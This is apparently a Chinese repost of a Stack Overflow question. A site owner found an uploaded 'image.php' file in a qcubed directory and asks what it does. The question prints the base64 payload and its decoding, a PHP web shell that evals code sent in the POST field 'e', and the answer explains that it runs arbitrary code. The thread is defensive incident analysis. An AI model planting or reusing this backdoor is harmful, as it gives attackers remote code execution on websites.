gpt4 book ai didi

php - eval on base64 encoded $_POST ['e' ] 变量实际上做了什么?

转载 作者:可可西里 更新时间:2023-11-01 12:18:08 27 4
gpt4 key购买 nike

好的,这是我用 Google 搜索的内容:

似乎在 qcubed 目录中上传了一个名为“image.php”的上传文件。

该 image.php 文件包含以下 base64 代码:

aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2VjaG8gJzMxMzkzNjJlMzIzMzMxMmQzMTM3MzIyZTMyMzgzYTY5NjY2MTYzNjU3MjZkNzA3NTYyNmQ2OTYzNjUzYTYxNjY2MTYzMzQzMjY1NzI2OTMwMzInOw==

解码它添加到这个:

if(isset($_POST['e']))

eval(base64_decode($_POST['e']));

echo '3139362e3233312d3137322e32383a6966616365726d7075626d6963653a6166616334326572693032';

通过搜索输出的字符串,我在其他站点上发现了类似的 qcubed 漏洞。

解码我得到的最后一个回显字符串:

196.231-172.28:ifacermpubmice:afac42eri02

我真的不明白它的作用(使用:http://ostermiller.org/calc/encode.html)。

你能解释一下我在这里面临的具体问题吗?为了解决这个问题,我应该解决什么安全漏洞?

最佳答案

该脚本将执行它从 e POST 变量获取的任何 PHP 代码,这当然是一个可怕的、最危险的漏洞。

echo 语句可能 是对攻击脚本的确认,即安装了正确的版本或类似的东西。

但是,只有当 image.php 文件实际上可以在该目录中执行时,这才是危险的。在不知道文件最初是如何到达那里的情况下,很难就如何操作给出建议。

关于php - eval on base64 encoded $_POST ['e' ] 变量实际上做了什么?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/4245594/

27 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com